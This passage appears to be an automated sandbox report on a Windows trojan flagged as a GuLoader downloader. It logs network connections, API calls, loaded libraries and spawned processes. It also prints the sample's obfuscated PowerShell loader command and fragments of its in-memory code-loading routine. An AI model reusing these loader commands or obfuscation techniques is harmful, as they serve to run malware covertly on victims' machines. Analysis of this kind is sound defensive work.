      Source: unknownNetwork traffic detected: HTTP traffic on port 53757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53602 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53466
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53465
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53464
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53585
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53463
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53469
      Source: unknownNetwork traffic detected: HTTP traffic on port 53551 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53468
      Source: unknownNetwork traffic detected: HTTP traffic on port 53683 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53500
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53467
      Source: unknownNetwork traffic detected: HTTP traffic on port 53468 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53494 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53471 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53471
      Source: unknownNetwork traffic detected: HTTP traffic on port 53785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53518
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53757
      Source: unknownNetwork traffic detected: HTTP traffic on port 53460 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53477 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53477
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53595
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53635
      Source: unknownNetwork traffic detected: HTTP traffic on port 53777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53511
      Source: unknownNetwork traffic detected: HTTP traffic on port 53534 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53484
      Source: unknownNetwork traffic detected: HTTP traffic on port 53763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53527
      Source: unknownNetwork traffic detected: HTTP traffic on port 53585 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53763
      Source: unknownNetwork traffic detected: HTTP traffic on port 53774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53518 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53643
      Source: unknownNetwork traffic detected: HTTP traffic on port 53527 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53659 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53494
      Source: unknownNetwork traffic detected: HTTP traffic on port 53716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53691 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53659
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53779
      Source: unknownNetwork traffic detected: HTTP traffic on port 53727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
      Source: unknownNetwork traffic detected: HTTP traffic on port 53462 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53650
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53534
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53775
      Source: unknownNetwork traffic detected: HTTP traffic on port 53740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
      Source: unknownNetwork traffic detected: HTTP traffic on port 53465 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53568 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53618 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53484 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53459 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
      Source: unknownNetwork traffic detected: HTTP traffic on port 53461 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
      Source: unknownNetwork traffic detected: HTTP traffic on port 53776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53789
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53700
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53666
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53787
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53544
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
      Source: unknownNetwork traffic detected: HTTP traffic on port 53792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53609 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53791
      Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
      Source: unknownNetwork traffic detected: HTTP traffic on port 53561 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53544 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53716
      Source: unknownNetwork traffic detected: HTTP traffic on port 53781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53675
      Source: unknownNetwork traffic detected: HTTP traffic on port 53643 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53551
      Source: unknownNetwork traffic detected: HTTP traffic on port 53700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53626 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53561
      Source: unknownNetwork traffic detected: HTTP traffic on port 53467 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53784 -> 443
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53462 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53464 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53468 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53500 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53534 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53568 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53585 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53602 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53618 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53635 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53650 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53666 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53683 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53700 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53773 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53775 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53785 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53787 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53789 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.4:53791 version: TLS 1.2
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_00405139 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405139

      System Summary

      barindex
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Calcifuge.exeJump to dropped file
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_004031DD EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,0_2_004031DD
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_004049760_2_00404976
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_004064EC0_2_004064EC
      Source: LMSxhK1u8Z.exeStatic PE information: invalid certificate
      Source: LMSxhK1u8Z.exe, 00000000.00000000.1666431914.0000000000475000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehampert.exeDVarFileInfo$ vs LMSxhK1u8Z.exe
      Source: LMSxhK1u8Z.exeBinary or memory string: OriginalFilenamehampert.exeDVarFileInfo$ vs LMSxhK1u8Z.exe
      Source: LMSxhK1u8Z.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/15@2/2
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_00404430 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404430
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeFile created: C:\Users\user\AppData\Roaming\PolysulfonateJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeFile created: C:\Users\user\AppData\Local\Temp\nsc3334.tmpJump to behavior
      Source: LMSxhK1u8Z.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: LMSxhK1u8Z.exeVirustotal: Detection: 72%
      Source: LMSxhK1u8Z.exeReversingLabs: Detection: 57%
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeFile read: C:\Users\user\Desktop\LMSxhK1u8Z.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\LMSxhK1u8Z.exe "C:\Users\user\Desktop\LMSxhK1u8Z.exe"
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets.SubString(22405,3);.$Disna($Yderpunktets)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Calcifuge.exe "C:\Users\user\AppData\Local\Temp\Calcifuge.exe"
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets.SubString(22405,3);.$Disna($Yderpunktets)" Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Calcifuge.exe "C:\Users\user\AppData\Local\Temp\Calcifuge.exe"Jump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Calcifuge.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: LMSxhK1u8Z.exeStatic file information: File size 1048752 > 1048576
      Source: Binary string: stem.Core.pdb@8 source: powershell.exe, 00000001.00000002.1994611870.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000001.00000002.1994611870.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2000880429.0000000008AA9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.1985666150.00000000033A5000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000006.00000002.2918084212.0000000001805000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.2002927074.0000000009A85000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Nykkerne $Polariseredes $Tornsangerens), (Electrooptics @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Skiferolie = [AppDomain]::CurrentDomain.GetAssembli
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Uidentificerbare)), $Vindaloolsevejret).DefineDynamicModule($Quodlibetz, $false).DefineType($Anjelica, $Pinjen, [System.MulticastDeleg
      Source: C:\Users\user\Desktop\LMSxhK1u8Z.exeCode function: 0_2_004060B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060B0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0504A597 push eax; iretd 1_2_0504A621
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0504E9F9 push eax; mov dword ptr [esp], edx1_2_0504EA0C
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0504CB55 push ebx; iretd 1_2_0504CB6A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098EC8E1 push es; iretd 1_2_098EC8E8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_098E503F push ds; iretd 1_2_098E505E
